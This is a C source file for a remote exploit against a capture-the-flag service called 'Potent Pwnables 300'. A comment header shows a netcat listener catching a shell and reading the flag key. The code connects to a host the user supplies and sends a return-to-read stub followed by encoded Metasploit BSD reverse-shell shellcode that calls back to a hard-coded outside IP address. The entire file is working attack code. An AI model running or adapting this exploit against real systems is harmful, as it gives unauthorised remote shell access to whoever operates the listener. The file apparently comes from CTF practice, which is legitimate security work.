/*
**
** 0x82-eat_pwnage300.c - Potent Pwnables 300 remote exploit by x82
**
** pwnage300 exploit: --
** [x82@x0x x82]$ nc -l -p 8282
** /bin/sh -i
** sh: can't access tty; job control turned off
** $ id
** uid=2002(pwnage300) gid=2002(pwnage300) groups=2002(pwnage300)
** $ cat /home/pwnage300/key
** ViAgR@ 4 ur shellcode
** $ exit
** [x82@x0x x82]$
** --
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

int main(int argc,char *argv[]){
	unsigned char janmury[]=
		"\x50" // push %eax
		"\x68\x66\x8e\x04\x08" // push $0x08048e66
		"\xc3" // ret (pop %eip)
		"\x82\x82\x82" // pad
	/*
		0x08048e66: pushl  0xfffffff8(%ebp)
		0x08048e69: pushl  0x8(%ebp)
		0x08048e6c: call   8048a18 <read@plt> read(sock,0x0804600,10);
	*/
		;
	/* bsd_ia32_reverse -  LHOST=221.154.133.30 LPORT=8282 Size=92 Encoder=PexFnstenvSub http://metasploit.com */
	unsigned char scode[] =
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x29\xc9\x83\xe9\xef\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0b"
		"\xe2\x2e\xc3\x83\xeb\xfc\xe2\xf4\x61\x83\x76\x5a\x59\xa0\x7c\x81"
		"\x59\x8a\xf3\x59\x8e\xfc\xe3\x43\x63\xf2\x2c\xe3\x51\x6b\xcf\xa9"
		"\x1b\xb3\x7e\x92\x9c\x88\x4c\x9b\xc6\x62\x44\xc1\x52\x52\x74\x92"
		"\x5c\xb3\xe3\x43\x42\x9b\xd8\x93\x63\xcd\x01\xb0\x63\x8a\x01\xa1"
		"\x62\x8c\xa7\x20\x5b\xb6\x7d\x90\xbb\xd9\xe3\x43";

	struct hostent *se;
	struct sockaddr_in saddr;
	int sock;
	int i;

	printf("\nPotent Pwnables 300 remote exploit by x82\n\n");

	if(argc<3){
		printf("Usage: %s [host] [port]\n",argv[0]);
		exit(-1);
	}
	se=gethostbyname(argv[1]);
	if(se==NULL){
		return -1;
	}
	sock=socket(AF_INET,SOCK_STREAM,0);
	if(sock==-1){
		return -1;
	}
	saddr.sin_family=AF_INET;
	saddr.sin_port=htons(atoi(argv[2]));
	saddr.sin_addr=*((struct in_addr *)se->h_addr);
	bzero(&(saddr.sin_zero),8);

	i=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr));
	if(i==-1){
		return -1;
	}
	// sleep(10);
	send(sock,janmury,strlen(janmury),0);
	send(sock,scode,strlen(scode),0);
	close(sock);
}

/* eoc */